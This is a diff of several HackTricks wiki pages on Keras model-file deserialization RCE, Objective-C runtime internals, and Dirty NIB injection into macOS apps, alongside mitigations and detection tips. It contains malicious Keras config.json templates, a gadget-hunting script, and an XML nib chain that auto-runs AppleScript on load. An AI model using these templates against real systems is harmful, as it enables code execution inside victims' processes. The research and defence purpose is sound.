- [Android Malware Promises Energy Subsidy to Steal Financial Data (McAfee Labs)](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-malware-promises-energy-subsidy-to-steal-financial-data/)
- [Firebase Cloud Messaging — Docs](https://firebase.google.com/docs/cloud-messaging)
{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -7,6 +7,7 @@
- [**Pyscript hacking tricks**](pyscript.md)
- [**Python deserializations**](../../pentesting-web/deserialization/README.md)
- [**Keras model deserialization RCE and gadget hunting**](keras-model-deserialization-rce-and-gadget-hunting.md)
- [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/README.md)
- [**Basic python web requests syntax**](web-requests.md)
- [**Basic python syntax and libraries**](basic-python.md)

View File

@ -0,0 +1,219 @@
# Keras Model Deserialization RCE and Gadget Hunting
{{#include ../../banners/hacktricks-training.md}}
This page summarizes practical exploitation techniques against the Keras model deserialization pipeline, explains the native .keras format internals and attack surface, and provides a researcher toolkit for finding Model File Vulnerabilities (MFVs) and post-fix gadgets.
## .keras model format internals
A .keras file is a ZIP archive containing at least:
- metadata.json: generic info (e.g., Keras version)
- config.json: model architecture (primary attack surface)
- model.weights.h5: weights in HDF5
The config.json drives recursive deserialization: Keras imports modules, resolves classes/functions and reconstructs layers/objects from attacker-controlled dictionaries.
Example snippet for a Dense layer object:
```json
{
  "module": "keras.layers",
  "class_name": "Dense",
  "config": {
    "units": 64,
    "activation": {
      "module": "keras.activations",
      "class_name": "relu"
    },
    "kernel_initializer": {
      "module": "keras.initializers",
      "class_name": "GlorotUniform"
    }
  }
}
```
Deserialization performs:
- Module import and symbol resolution from module/class_name keys
- from_config(...) or constructor invocation with attacker-controlled kwargs
- Recursion into nested objects (activations, initializers, constraints, etc.)
Historically, this exposed three primitives to an attacker crafting config.json (sketched conceptually below):
- Control of what modules are imported
- Control of which classes/functions are resolved
- Control of kwargs passed into constructors/from_config
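Conceptually (this is a rough model, not Keras' literal code), the deserializer behaved like this, which is why those three primitives matter:

```python
import importlib

def deserialize_like(cfg):
    module = importlib.import_module(cfg["module"])        # 1) attacker picks the module
    symbol = getattr(module, cfg["class_name"])            # 2) attacker picks the class/function
    if hasattr(symbol, "from_config"):
        return symbol.from_config(cfg.get("config", {}))   # 3) attacker-controlled kwargs
    return symbol(**cfg.get("config", {}))
```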
## CVE-2024-3660 Lambda-layer bytecode RCE
Root cause:
- Lambda.from_config() used python_utils.func_load(...) which base64-decodes and calls marshal.loads() on attacker bytes; Python unmarshalling can execute code.
Exploit idea (simplified payload in config.json):
```json
{
  "module": "keras.layers",
  "class_name": "Lambda",
  "config": {
    "name": "exploit_lambda",
    "function": {
      "function_type": "lambda",
      "bytecode_b64": "<attacker_base64_marshal_payload>"
    }
  }
}
```
Mitigation:
- Keras enforces safe_mode=True by default. Serialized Python functions in Lambda are blocked unless a user explicitly opts out with safe_mode=False.
Notes:
- Legacy formats (older HDF5 saves) or older codebases may not enforce modern checks, so “downgrade” style attacks can still apply when victims use older loaders.
## CVE-2025-1550 Arbitrary module import in Keras ≤ 3.8
Root cause:
- _retrieve_class_or_fn used unrestricted importlib.import_module() with attacker-controlled module strings from config.json.
- Impact: Arbitrary import of any installed module (or attacker-planted module on sys.path). Import-time code runs, then object construction occurs with attacker kwargs.
Exploit idea:
```json
{
"module": "maliciouspkg",
"class_name": "Danger",
"config": {"arg": "val"}
}
```
Security improvements (Keras ≥ 3.9):
- Module allowlist: imports restricted to official ecosystem modules: keras, keras_hub, keras_cv, keras_nlp
- Safe mode default: safe_mode=True blocks unsafe Lambda serialized-function loading
- Basic type checking: deserialized objects must match expected types
## Post-fix gadget surface inside allowlist
Even with allowlisting and safe mode, a broad surface remains among allowed Keras callables. For example, keras.utils.get_file can download arbitrary URLs to user-selectable locations.
Gadget via Lambda that references an allowed function (not serialized Python bytecode):
```json
{
  "module": "keras.layers",
  "class_name": "Lambda",
  "config": {
    "name": "dl",
    "function": {"module": "keras.utils", "class_name": "get_file"},
    "arguments": {
      "fname": "artifact.bin",
      "origin": "https://example.com/artifact.bin",
      "cache_dir": "/tmp/keras-cache"
    }
  }
}
```
Important limitation:
- Lambda.call() prepends the input tensor as the first positional argument when invoking the target callable. Chosen gadgets must tolerate an extra positional arg (or accept *args/**kwargs). This constrains which functions are viable.
Potential impacts of allowlisted gadgets:
- Arbitrary download/write (path planting, config poisoning)
- Network callbacks/SSRF-like effects depending on environment
- Chaining to code execution if written paths are later imported/executed or added to PYTHONPATH, or if a writable execution-on-write location exists
## Researcher toolkit
1) Systematic gadget discovery in allowed modules
Enumerate candidate callables across keras, keras_nlp, keras_cv, keras_hub and prioritize those with file/network/process/env side effects.
```python
import importlib, inspect, pkgutil
ALLOWLIST = ["keras", "keras_nlp", "keras_cv", "keras_hub"]
seen = set()
def iter_modules(mod):
    if not hasattr(mod, "__path__"):
        return
    for m in pkgutil.walk_packages(mod.__path__, mod.__name__ + "."):
        yield m.name

candidates = []
for root in ALLOWLIST:
    try:
        r = importlib.import_module(root)
    except Exception:
        continue
    for name in iter_modules(r):
        if name in seen:
            continue
        seen.add(name)
        try:
            m = importlib.import_module(name)
        except Exception:
            continue
        for n, obj in inspect.getmembers(m):
            if inspect.isfunction(obj) or inspect.isclass(obj):
                sig = None
                try:
                    sig = str(inspect.signature(obj))
                except Exception:
                    pass
                doc = (inspect.getdoc(obj) or "").lower()
                text = f"{name}.{n} {sig} :: {doc}"
                # Heuristics: look for I/O or network-ish hints
                if any(x in doc for x in ["download", "file", "path", "open", "url", "http", "socket", "env", "process", "spawn", "exec"]):
                    candidates.append(text)
print("\n".join(sorted(candidates)[:200]))
```
2) Direct deserialization testing (no .keras archive needed)
Feed crafted dicts directly into Keras deserializers to learn accepted params and observe side effects.
```python
from keras import layers
cfg = {
    "module": "keras.layers",
    "class_name": "Lambda",
    "config": {
        "name": "probe",
        "function": {"module": "keras.utils", "class_name": "get_file"},
        "arguments": {"fname": "x", "origin": "https://example.com/x"}
    }
}
layer = layers.deserialize(cfg, safe_mode=True) # Observe behavior
```
3) Cross-version probing and formats
Keras exists in multiple codebases/eras with different guardrails and formats:
- TensorFlow built-in Keras: tensorflow/python/keras (legacy, slated for deletion)
- tf-keras: maintained separately
- Multi-backend Keras 3 (official): introduced native .keras
Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover regressions or missing guards.
## Defensive recommendations
- Treat model files as untrusted input. Only load models from trusted sources.
- Keep Keras up to date; use Keras ≥ 3.9 to benefit from allowlisting and type checks.
- Do not set safe_mode=False when loading models unless you fully trust the file (see the snippet below).
- Consider running deserialization in a sandboxed, least-privileged environment without network egress and with restricted filesystem access.
- Enforce allowlists/signatures for model sources and integrity checking where possible.
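For example, keep the defaults when loading model files (sketch; `safe_mode=True` is already the default in current Keras 3):

```python
import keras

# Only load artifacts from sources you trust; keeping safe_mode=True makes Keras
# reject serialized Lambda Python code instead of executing it.
model = keras.models.load_model("model.keras", safe_mode=True)
```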
## References
- [Hunting Vulnerabilities in Keras Model Deserialization (huntr blog)](https://blog.huntr.com/hunting-vulnerabilities-in-keras-model-deserialization)
- [Keras PR #20751: Added checks to serialization](https://github.com/keras-team/keras/pull/20751)
- [CVE-2024-3660: Keras Lambda deserialization RCE](https://nvd.nist.gov/vuln/detail/CVE-2024-3660)
- [CVE-2025-1550: Keras arbitrary module import (≤ 3.8)](https://nvd.nist.gov/vuln/detail/CVE-2025-1550)
- [huntr report: arbitrary import #1](https://huntr.com/bounties/135d5dcd-f05f-439f-8d8f-b21fdf171f3e)
- [huntr report: arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -4,9 +4,9 @@
## CFRuntimeClass
CF\* objects come from CoreFOundation, which provides more than 50 classes of objects like `CFString`, `CFNumber` or `CFAllocatior`.
CF* objects come from CoreFoundation, which provides more than 50 classes of objects like `CFString`, `CFNumber` or `CFAllocator`.
All these clases are instances of the class `CFRuntimeClass`, which when called it returns an index to the `__CFRuntimeClassTable`. The CFRuntimeClass is defined in [**CFRuntime.h**](https://opensource.apple.com/source/CF/CF-1153.18/CFRuntime.h.auto.html):
All these classes are instances of the class `CFRuntimeClass`, which, when called, returns an index into the `__CFRuntimeClassTable`. The CFRuntimeClass is defined in [**CFRuntime.h**](https://opensource.apple.com/source/CF/CF-1153.18/CFRuntime.h.auto.html):
```objectivec
// Some comments were added to the original code
@ -59,36 +59,47 @@ typedef struct __CFRuntimeClass {
### Memory sections used
Most of the data used by ObjectiveC runtime will change during the execution, therefore it uses some sections from the **\_\_DATA** segment in memory:
Most of the data used by the Objective-C runtime changes during execution; therefore, it uses a number of sections from the Mach-O `__DATA` family of segments in memory. Historically these included:
- **`__objc_msgrefs`** (`message_ref_t`): Message references
- **`__objc_ivar`** (`ivar`): Instance variables
- **`__objc_data`** (`...`): Mutable data
- **`__objc_classrefs`** (`Class`): Class references
- **`__objc_superrefs`** (`Class`): Superclass references
- **`__objc_protorefs`** (`protocol_t *`): Protocol references
- **`__objc_selrefs`** (`SEL`): Selector references
- **`__objc_const`** (`...`): Class `r/o` data and other (hopefully) constant data
- **`__objc_imageinfo`** (`version, flags`): Used during image load: Version currently `0`; Flags specify preoptimized GC support, etc.
- **`__objc_protolist`** (`protocol_t *`): Protocol list
- **`__objc_nlcatlist`** (`category_t`): Pointer to Non-Lazy Categories defined in this binary
- **`__objc_catlist`** (`category_t`): Pointer to Categories defined in this binary
- **`__objc_nlclslist`** (`classref_t`): Pointer to Non-Lazy Objective-C classes defined in this binary
- **`__objc_classlist`** (`classref_t`): Pointers to all Objective-C classes defined in this binary
- `__objc_msgrefs` (`message_ref_t`): Message references
- `__objc_ivar` (`ivar`): Instance variables
- `__objc_data` (`...`): Mutable data
- `__objc_classrefs` (`Class`): Class references
- `__objc_superrefs` (`Class`): Superclass references
- `__objc_protorefs` (`protocol_t *`): Protocol references
- `__objc_selrefs` (`SEL`): Selector references
- `__objc_const` (`...`): Class r/o data and other (hopefully) constant data
- `__objc_imageinfo` (`version, flags`): Used during image load: Version currently `0`; Flags specify preoptimized GC support, etc.
- `__objc_protolist` (`protocol_t *`): Protocol list
- `__objc_nlcatlist` (`category_t`): Pointer to Non-Lazy Categories defined in this binary
- `__objc_catlist` (`category_t`): Pointer to Categories defined in this binary
- `__objc_nlclslist` (`classref_t`): Pointer to Non-Lazy Objective-C classes defined in this binary
- `__objc_classlist` (`classref_t`): Pointers to all Objective-C classes defined in this binary
It also uses a few sections in the **`__TEXT`** segment to store constan values of it's not possible to write in this section:
It also uses a few sections in the `__TEXT` segment to store constants:
- **`__objc_methname`** (C-String): Method names
- **`__objc_classname`** (C-String): Class names
- **`__objc_methtype`** (C-String): Method types
- `__objc_methname` (C-String): Method names
- `__objc_classname` (C-String): Class names
- `__objc_methtype` (C-String): Method types
Modern macOS/iOS (especially on Apple Silicon) also place Objective-C/Swift metadata in:
- `__DATA_CONST`: immutable Objective-C metadata that can be shared read-only across processes (for example many `__objc_*` lists now live here).
- `__AUTH` / `__AUTH_CONST`: segments containing pointers that must be authenticated at load or use-time on arm64e (Pointer Authentication). You will also see `__auth_got` in `__AUTH_CONST` instead of the legacy `__la_symbol_ptr`/`__got` only. When instrumenting or hooking, remember to account for both `__got` and `__auth_got` entries in modern binaries.
For background on dyld preoptimization (e.g., selector uniquing and class/protocol precomputation) and why many of these sections are "already fixed up" when coming from the shared cache, check the Apple `objc-opt` sources and dyld shared cache notes. This affects where and how you can patch metadata at runtime.
{{#ref}}
../macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
{{#endref}}
### Type Encoding
Objective-c uses some mangling to encode selector and variable types of simple and complex types:
Objective-C uses mangling to encode selector and variable types of simple and complex types:
- Primitive types use their first letter of the type `i` for `int`, `c` for `char`, `l` for `long`... and uses the capital letter in case it's unsigned (`L` for `unsigned Long`).
- Other data types whose letters are used or are special, use other letters or symbols like `q` for `long long`, `b` for `bitfields`, `B` for `booleans`, `#` for `classes`, `@` for `id`, `*` for `char pointers` , `^` for generic `pointers` and `?` for `undefined`.
- Arrays, structures and unions use `[`, `{` and `(`
- Primitive types use their first letter of the type `i` for `int`, `c` for `char`, `l` for `long`... and use the capital letter in case it's unsigned (`L` for `unsigned long`).
- Other data types use other letters or symbols like `q` for `long long`, `b` for bitfields, `B` for booleans, `#` for classes, `@` for `id`, `*` for `char *`, `^` for generic pointers and `?` for undefined.
- Arrays, structures and unions use `[`, `{` and `(` respectively.
#### Example Method Declaration
@ -111,18 +122,18 @@ The complete type encoding for the method is:
#### Detailed Breakdown
1. **Return Type (`NSString *`)**: Encoded as `@` with length 24
2. **`self` (object instance)**: Encoded as `@`, at offset 0
3. **`_cmd` (selector)**: Encoded as `:`, at offset 8
4. **First argument (`char * input`)**: Encoded as `*`, at offset 16
5. **Second argument (`NSDictionary * options`)**: Encoded as `@`, at offset 20
6. **Third argument (`NSError ** error`)**: Encoded as `^@`, at offset 24
1. Return Type (`NSString *`): Encoded as `@` with length 24
2. `self` (object instance): Encoded as `@`, at offset 0
3. `_cmd` (selector): Encoded as `:`, at offset 8
4. First argument (`char * input`): Encoded as `*`, at offset 16
5. Second argument (`NSDictionary * options`): Encoded as `@`, at offset 20
6. Third argument (`NSError ** error`): Encoded as `^@`, at offset 24
**With the selector + the encoding you can reconstruct the method.**
With the selector + the encoding you can reconstruct the method.
### **Classes**
### Classes
Clases in Objective-C is a struct with properties, method pointers... It's possible to find the struct `objc_class` in the [**source code**](https://opensource.apple.com/source/objc4/objc4-756.2/runtime/objc-runtime-new.h.auto.html):
Classes in Objective-C are C structs with properties, method pointers, etc. It's possible to find the struct `objc_class` in the [**source code**](https://opensource.apple.com/source/objc4/objc4-756.2/runtime/objc-runtime-new.h.auto.html):
```objectivec
struct objc_class : objc_object {
@ -145,12 +156,126 @@ struct objc_class : objc_object {
[...]
```
This class use some bits of the isa field to indicate some information about the class.
This class uses some bits of the `isa` field to indicate information about the class.
Then, the struct has a pointer to the struct `class_ro_t` stored on disk which contains attributes of the class like its name, base methods, properties and instance variables.\
During runtime and additional structure `class_rw_t` is used containing pointers which can be altered such as methods, protocols, properties...
Then, the struct has a pointer to the struct `class_ro_t` stored on disk which contains attributes of the class like its name, base methods, properties and instance variables. During runtime an additional structure `class_rw_t` is used containing pointers which can be altered such as methods, protocols, properties.
{{#ref}}
../macos-basic-objective-c.md
{{#endref}}
---
## Modern object representations in memory (arm64e, tagged pointers, Swift)
### Non-pointer `isa` and Pointer Authentication (arm64e)
On Apple Silicon and recent runtimes the Objective-C `isa` is not always a raw class pointer. On arm64e it is a packed structure that may also carry a Pointer Authentication Code (PAC). Depending on the platform it may include fields like `nonpointer`, `has_assoc`, `weakly_referenced`, `extra_rc`, and the class pointer itself (shifted or signed). This means blindly dereferencing the first 8 bytes of an Objective-C object will not always yield a valid `Class` pointer.
Practical notes when debugging on arm64e:
- LLDB will usually strip PAC bits for you when printing Objective-C objects with `po`, but when working with raw pointers you may need to strip authentication manually:
```lldb
(lldb) expr -l objc++ -- #include <ptrauth.h>
(lldb) expr -l objc++ -- void *raw = ptrauth_strip((void*)0x000000016f123abc, ptrauth_key_asda);
(lldb) expr -l objc++ -O -- (Class)object_getClass((id)raw)
```
- Many function/data pointers in Mach-O will reside in `__AUTH`/`__AUTH_CONST` and require authentication before use. If you are interposing or rebinding (e.g., fishhook-style), ensure you also handle `__auth_got` in addition to the legacy `__got`.
For a deep dive into language/ABI guarantees and the `<ptrauth.h>` intrinsics available from Clang/LLVM, see the reference at the end of this page.
### Tagged pointer objects
Some Foundation classes avoid heap allocation by encoding the object's payload directly in the pointer value (tagged pointers). Detection differs by platform (e.g., the most-significant bit on arm64, least-significant on x86_64 macOS). Tagged objects don't have a regular `isa` stored in memory; the runtime resolves the class from the tag bits. When inspecting arbitrary `id` values:
- Use runtime APIs instead of poking the `isa` field: `object_getClass(obj)` / `[obj class]`.
- In LLDB, just `po (id)0xADDR` will print tagged pointer instances correctly because the runtime is consulted to resolve the class.
### Swift heap objects and metadata
Pure Swift classes are also objects with a header pointing to Swift metadata (not an Objective-C `isa`). To introspect live Swift processes without modifying them you can use the Swift toolchain's `swift-inspect`, which leverages the Remote Mirror library to read runtime metadata:
```bash
# Xcode toolchain (or Swift.org toolchain) provides swift-inspect
swift-inspect dump-raw-metadata <pid-or-name>
swift-inspect dump-arrays <pid-or-name>
# On Darwin additionally:
swift-inspect dump-concurrency <pid-or-name>
```
This is very useful to map Swift heap objects and protocol conformances when reversing mixed Swift/ObjC apps.
---
## Runtime inspection cheatsheet (LLDB / Frida)
### LLDB
- Print object or class from a raw pointer:
```lldb
(lldb) expr -l objc++ -O -- (id)0x0000000101234560
(lldb) expr -l objc++ -O -- (Class)object_getClass((id)0x0000000101234560)
```
- Inspect the Objective-C class from a pointer to an object (a method's `self`) at a breakpoint:
```lldb
(lldb) br se -n '-[NSFileManager fileExistsAtPath:]'
(lldb) r
... breakpoint hit ...
(lldb) po (id)$x0 # self
(lldb) expr -l objc++ -O -- (Class)object_getClass((id)$x0)
```
- Dump sections that carry Objective-C metadata (note: many are now in `__DATA_CONST` / `__AUTH_CONST`):
```lldb
(lldb) image dump section --section __DATA_CONST.__objc_classlist
(lldb) image dump section --section __DATA_CONST.__objc_selrefs
(lldb) image dump section --section __AUTH_CONST.__auth_got
```
- Read memory for a known class object to pivot to `class_ro_t` / `class_rw_t` when reversing method lists:
```lldb
(lldb) image lookup -r -n _OBJC_CLASS_$_NSFileManager
(lldb) memory read -fx -s8 0xADDRESS_OF_CLASS_OBJECT
```
### Frida (Objective-C and Swift)
Frida provides high-level runtime bridges that are very handy to discover and instrument live objects without symbols:
- Enumerate classes and methods, resolve actual class names at runtime, and intercept Objective-C selectors:
```js
if (ObjC.available) {
  // List a class' methods
  console.log(ObjC.classes.NSFileManager.$ownMethods);
  // Intercept and inspect arguments/return values
  const impl = ObjC.classes.NSFileManager['- fileExistsAtPath:isDirectory:'].implementation;
  Interceptor.attach(impl, {
    onEnter(args) {
      this.path = new ObjC.Object(args[2]).toString();
    },
    onLeave(retval) {
      console.log('fileExistsAtPath:', this.path, '=>', retval);
    }
  });
}
```
- Swift bridge: enumerate Swift types and interact with Swift instances (requires recent Frida; very useful on Apple Silicon targets).
---
## References
- Clang/LLVM: Pointer Authentication and the `<ptrauth.h>` intrinsics (arm64e ABI). https://clang.llvm.org/docs/PointerAuthentication.html
- Apple objc runtime headers (tagged pointers, non-pointer `isa`, etc.), e.g., `objc-object.h`. https://opensource.apple.com/source/objc4/objc4-818.2/runtime/objc-object.h.auto.html
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -2,75 +2,151 @@
{{#include ../../../banners/hacktricks-training.md}}
**For further detail about the technique check the original post from:** [**https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/) and the following post by [**https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/**](https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/)**.** Here is a summary:
Dirty NIB refers to abusing Interface Builder files (.xib/.nib) inside a signed macOS app bundle to execute attacker-controlled logic inside the target process, thereby inheriting its entitlements and TCC permissions. This technique was originally documented by xpn (MDSec) and later generalized and significantly expanded by Sector7, who also covered Apple's mitigations in macOS 13 Ventura and macOS 14 Sonoma. For background and deep dives, see the references at the end.
### What are Nib files
> TL;DR
> • Before macOS 13 Ventura: replacing a bundle's MainMenu.nib (or another nib loaded at startup) could reliably achieve process injection and often privilege escalation.
> • Since macOS 13 (Ventura) and improved in macOS 14 (Sonoma): first-launch deep verification, bundle protection, Launch Constraints, and the new TCC “App Management” permission largely prevent post-launch nib tampering by unrelated apps. Attacks may still be feasible in niche cases (e.g., same-developer tooling modifying own apps, or terminals granted App Management/Full Disk Access by the user).
Nib (short for NeXT Interface Builder) files, part of Apple's development ecosystem, are intended for defining **UI elements** and their interactions in applications. They encompass serialized objects such as windows and buttons, and are loaded at runtime. Despite their ongoing usage, Apple now advocates for Storyboards for more comprehensive UI flow visualization.
The main Nib file is referenced in the value **`NSMainNibFile`** inside the `Info.plist` file of the application and is loaded by the function **`NSApplicationMain`** executed in the `main` function of the application.
## What are NIB/XIB files
### Dirty Nib Injection Process
Nib (short for NeXT Interface Builder) files are serialized UI object graphs used by AppKit apps. Modern Xcode stores editable XML .xib files which are compiled into .nib at build time. A typical app loads its main UI via `NSApplicationMain()`, which reads the `NSMainNibFile` key from the app's Info.plist and instantiates the object graph at runtime.
#### Creating and Setting Up a NIB File
Key points that enable the attack:
- NIB loading instantiates arbitrary Objective-C classes without requiring them to conform to NSSecureCoding (Apple's nib loader falls back to `init`/`initWithFrame:` when `initWithCoder:` is not available).
- Cocoa Bindings can be abused to call methods as nibs are instantiated, including chained calls that require no user interaction.
1. **Initial Setup**:
- Create a new NIB file using XCode.
- Add an Object to the interface, setting its class to `NSAppleScript`.
- Configure the initial `source` property via User Defined Runtime Attributes.
2. **Code Execution Gadget**:
- The setup facilitates running AppleScript on demand.
- Integrate a button to activate the `Apple Script` object, specifically triggering the `executeAndReturnError:` selector.
3. **Testing**:
- A simple Apple Script for testing purposes:
## Dirty NIB injection process (attacker view)
```bash
set theDialogText to "PWND"
display dialog theDialogText
```
The classic pre-Ventura flow:
1) Create a malicious .xib
- Add an `NSAppleScript` object (or other “gadget” classes such as `NSTask`).
- Add an `NSTextField` whose title contains the payload (e.g., AppleScript or command arguments).
- Add one or more `NSMenuItem` objects wired via bindings to call methods on the target object.
- Test by running in the XCode debugger and clicking the button.
2) Auto-trigger without user clicks
- Use bindings to set a menu item's target/selector and then invoke the private `_corePerformAction` method so the action fires automatically when the nib loads. This removes the need for a user to click a button.
#### Targeting an Application (Example: Pages)
Minimal example of an auto-trigger chain inside a .xib (abridged for clarity):
```xml
<objects>
  <customObject id="A1" customClass="NSAppleScript"/>
  <textField id="A2" title="display dialog \"PWND\""/>
  <!-- Menu item that will call -initWithSource: on NSAppleScript with A2.title -->
  <menuItem id="C1">
    <connections>
      <binding name="target" destination="A1"/>
      <binding name="selector" keyPath="initWithSource:"/>
      <binding name="Argument" destination="A2" keyPath="title"/>
    </connections>
  </menuItem>
  <!-- Menu item that will call -executeAndReturnError: on NSAppleScript -->
  <menuItem id="C2">
    <connections>
      <binding name="target" destination="A1"/>
      <binding name="selector" keyPath="executeAndReturnError:"/>
    </connections>
  </menuItem>
  <!-- Triggers that auto-press the above menu items at load time -->
  <menuItem id="T1"><connections><binding keyPath="_corePerformAction" destination="C1"/></connections></menuItem>
  <menuItem id="T2"><connections><binding keyPath="_corePerformAction" destination="C2"/></connections></menuItem>
</objects>
```
This achieves arbitrary AppleScript execution in the target process upon nib load. Advanced chains can:
- Instantiate arbitrary AppKit classes (e.g., `NSTask`) and call zero-argument methods like `-launch`.
- Call arbitrary selectors with object arguments via the binding trick above.
- Load AppleScriptObjC.framework to bridge into Objective-C and even call selected C APIs.
- On older systems that still include Python.framework, bridge into Python and then use `ctypes` to call arbitrary C functions (Sector7's research).
1. **Preparation**:
- Copy the target app (e.g., Pages) into a separate directory (e.g., `/tmp/`).
- Initiate the app to sidestep Gatekeeper issues and cache it.
2. **Overwriting NIB File**:
- Replace an existing NIB file (e.g., About Panel NIB) with the crafted DirtyNIB file.
3. **Execution**:
- Trigger the execution by interacting with the app (e.g., selecting the `About` menu item).
3) Replace the app's nib
- Copy target.app to a writable location, replace e.g. `Contents/Resources/MainMenu.nib` with the malicious nib, and run target.app. Pre-Ventura, after a one-time Gatekeeper assessment, subsequent launches only performed shallow signature checks, so non-executable resources (like .nib) weren't re-validated.
#### Proof of Concept: Accessing User Data
Example AppleScript payload for a visible test:
```applescript
set theDialogText to "PWND"
display dialog theDialogText
```
- Modify the AppleScript to access and extract user data, such as photos, without user consent.
### Code Sample: Malicious .xib File
## Modern macOS protections (Ventura/Monterey/Sonoma/Sequoia)
- Access and review a [**sample of a malicious .xib file**](https://gist.github.com/xpn/16bfbe5a3f64fedfcc1822d0562636b4) that demonstrates executing arbitrary code.
Apple introduced several systemic mitigations that dramatically reduce the viability of Dirty NIB in modern macOS:
- First-launch deep verification and bundle protection (macOS 13 Ventura)
- On first run of any app (quarantined or not), a deep signature check covers all bundle resources. Afterwards, the bundle becomes protected: only apps from the same developer (or explicitly allowed by the app) may modify its contents. Other apps require the new TCC “App Management” permission to write into another app's bundle.
- Launch Constraints (macOS 13 Ventura)
- System/Apple-bundled apps can't be copied elsewhere and launched; this kills the “copy to /tmp, patch, run” approach for OS apps.
- Improvements in macOS 14 Sonoma
- Apple hardened App Management and fixed known bypasses (e.g., CVE-2023-40450) noted by Sector7. Python.framework was removed earlier (macOS 12.3), breaking some privilege-escalation chains.
- Gatekeeper/Quarantine changes
- For a broader discussion of Gatekeeper, provenance, and assessment changes that impacted this technique, see the page referenced below.
> Practical implication
> • On Ventura+ you generally cannot modify a third-party app's .nib unless your process has App Management or is signed by the same Team ID as the target (e.g., developer tooling).
> • Granting App Management or Full Disk Access to shells/terminals effectively reopens this attack surface for anything that can execute code inside that terminal's context.

### Other Example

In the post [https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/](https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/) you can find a tutorial on how to create a dirty nib.
### Addressing Launch Constraints
- Launch Constraints hinder app execution from unexpected locations (e.g., `/tmp`).
- It's possible to identify apps not protected by Launch Constraints and target them for NIB file injection.
Launch Constraints block running many Apple apps from non-default locations beginning with Ventura. If you were relying on pre-Ventura workflows like copying an Apple app to a temp directory, modifying `MainMenu.nib`, and launching it, expect that to fail on >= 13.0.
### Additional macOS Protections
From macOS Sonoma onwards, modifications inside App bundles are restricted. However, earlier methods involved:
1. Copying the app to a different location (e.g., `/tmp/`).
2. Renaming directories within the app bundle to bypass initial protections.
3. After running the app to register with Gatekeeper, modifying the app bundle (e.g., replacing MainMenu.nib with Dirty.nib).
4. Renaming directories back and rerunning the app to execute the injected NIB file.

## Enumerating targets and nibs (useful for research / legacy systems)
- Locate apps whose UI is nib-driven:
```bash
find /Applications -maxdepth 3 -name Info.plist -exec sh -c \
'for p; do if /usr/libexec/PlistBuddy -c "Print :NSMainNibFile" "$p" >/dev/null 2>&1; \
then echo "[+] $(dirname "$p") uses NSMainNibFile=$( /usr/libexec/PlistBuddy -c "Print :NSMainNibFile" "$p" )"; fi; done' sh {} +
```
- Find candidate nib resources inside a bundle:
```bash
find target.app -type f \( -name "*.nib" -o -name "*.xib" \) -print
```
- Validate code signatures deeply (will fail if you tampered with resources and didn't re-sign):
```bash
codesign --verify --deep --strict --verbose=4 target.app
```
**Note**: Recent macOS updates have mitigated this exploit by preventing file modifications within app bundles post Gatekeeper caching, rendering the exploit ineffective.
> Note: On modern macOS you will also be blocked by bundle protection/TCC when trying to write into another app's bundle without proper authorization.
## Detection and DFIR tips
- File integrity monitoring on bundle resources
- Watch for mtime/ctime changes to `Contents/Resources/*.nib` and other non-executable resources in installed apps.
- Unified logs and process behavior
- Monitor for unexpected AppleScript execution inside GUI apps and for processes loading AppleScriptObjC or Python.framework. Example:
```bash
log stream --info --predicate 'processImagePath CONTAINS[cd] ".app/Contents/MacOS/" AND (eventMessage CONTAINS[cd] "AppleScript" OR eventMessage CONTAINS[cd] "loadAppleScriptObjectiveCScripts")'
```
- Proactive assessments
- Periodically run `codesign --verify --deep` across critical apps to ensure resources remain intact.
- Privilege context
- Audit who/what has TCC “App Management” or Full Disk Access (especially terminals and management agents). Removing these from general-purpose shells prevents trivially re-enabling Dirty NIB-style tampering.
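As a minimal sketch of the file-integrity idea from the first bullet above, the following baselines and re-checks hashes of nib resources under /Applications; the baseline file location and scope are illustrative:

```python
#!/usr/bin/env python3
# Sketch: baseline + diff SHA-256 hashes of .nib resources inside app bundles.
import hashlib, json, sys
from pathlib import Path

BASELINE = Path("nib_baseline.json")   # illustrative location

def hash_nibs(root: str = "/Applications") -> dict:
    digests = {}
    for nib in Path(root).rglob("*.nib"):
        try:
            digests[str(nib)] = hashlib.sha256(nib.read_bytes()).hexdigest()
        except (PermissionError, OSError):
            continue   # unreadable entries and .nib directories are skipped
    return digests

if __name__ == "__main__":
    current = hash_nibs()
    if not BASELINE.exists() or "--baseline" in sys.argv:
        BASELINE.write_text(json.dumps(current, indent=2))
        print(f"[+] Baseline written: {len(current)} nib files")
    else:
        old = json.loads(BASELINE.read_text())
        for path, digest in current.items():
            if path in old and old[path] != digest:
                print(f"[!] Modified nib resource: {path}")
            elif path not in old:
                print(f"[?] New nib resource: {path}")
```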
## Defensive hardening (developers and defenders)
- Prefer programmatic UI or limit what's instantiated from nibs. Avoid including powerful classes (e.g., `NSTask`) in nib graphs and avoid bindings that indirectly invoke selectors on arbitrary objects.
- Adopt the hardened runtime with Library Validation (already standard for modern apps). While this doesn't stop nib injection by itself, it blocks easy native code loading and forces attackers into scripting-only payloads.
- Do not request or depend on broad App Management permissions in general-purpose tools. If MDM requires App Management, segregate that context from user-driven shells.
- Regularly verify your app bundle's integrity and make your update mechanisms self-heal bundle resources.
## Related reading in HackTricks
Learn more about Gatekeeper, quarantine and provenance changes that affect this technique:
{{#ref}}
../macos-security-protections/macos-gatekeeper.md
{{#endref}}
## References
- xpn DirtyNIB (original writeup with Pages example): https://blog.xpnsec.com/dirtynib/
- Sector7 Bringing process injection into view(s): exploiting all macOS apps using nib files (April 5, 2024): https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/
{{#include ../../../banners/hacktricks-training.md}}

View File

